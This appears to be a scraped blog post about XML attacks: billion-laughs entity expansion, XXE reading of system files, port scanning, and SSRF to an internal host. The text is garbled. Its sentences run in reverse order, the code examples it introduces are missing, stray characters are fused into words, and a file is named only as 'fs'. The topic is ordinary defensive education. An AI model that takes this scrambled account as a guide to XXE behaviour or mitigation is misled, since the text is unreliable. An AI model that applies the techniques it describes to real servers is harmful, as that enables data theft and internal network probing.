![]() Here is an example of an external entity that causes a server to make a backend HTTP request to an internal system within the organization's network: If an application response is not available, the attackers can still perform a blind SSRF attack. If the attacker manages to place this data value within an application response, they will be able to see the content of the URL within the app response, allowing two-way interaction with the backend system. In order to perform an SSRF attack via an XXE vulnerability, the attacker needs to define an external XML entity with the target URL they want to reach from the server, and use this entity in a data value. An SSRF attack involves attackers exploiting a server-side application to make HTTP requests to any URL that the server can reach. Another possible impact is that XXE can be used to perform server-side request forgery (SSRF). Related content: Read our guide to data breaches SSRF AttacksĪttackers can use XXE attacks for more than just retrieving sensitive data. For example, if the target system can connect to a file server on IP address 10.0.0.5, the attacker can retrieve sensitive data from the server like this: Most servers use the same directories for sensitive system files, making this an easy endeavor for attackers.įor example, the following code will return the content of the fs file, which defines login settings, on a vulnerable Linux system:Īnother important element of XXE attacks is that they can be used to scan ports or retrieve data from other hosts connected to the target system. An external entity (defined on a server controlled by the attacker) can reference URIs on the local server to retrieve sensitive content from the file system. XML attacks get more interesting when external entities are involved. An alternative way to achieve the same effect is to reference a very long or infinite string, such as the /dev/urandom string on Linux operating systems. The above example generates several hundred LOL strings, but in a full-scale example, the code could generate billions of lines of output, exhausting memory on the server. The XML parser parses this code and expands each of the entities, generating a large number of “LOLs”. Take the following DOCTYPE definition that defines a new XML entity: This attack is mitigated in most modern XML parsers, but can help illustrate how XML attacks work. The most basic XML-based attack, although not strictly an external XML entity attack, is the so-called “billion laughs” attack.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |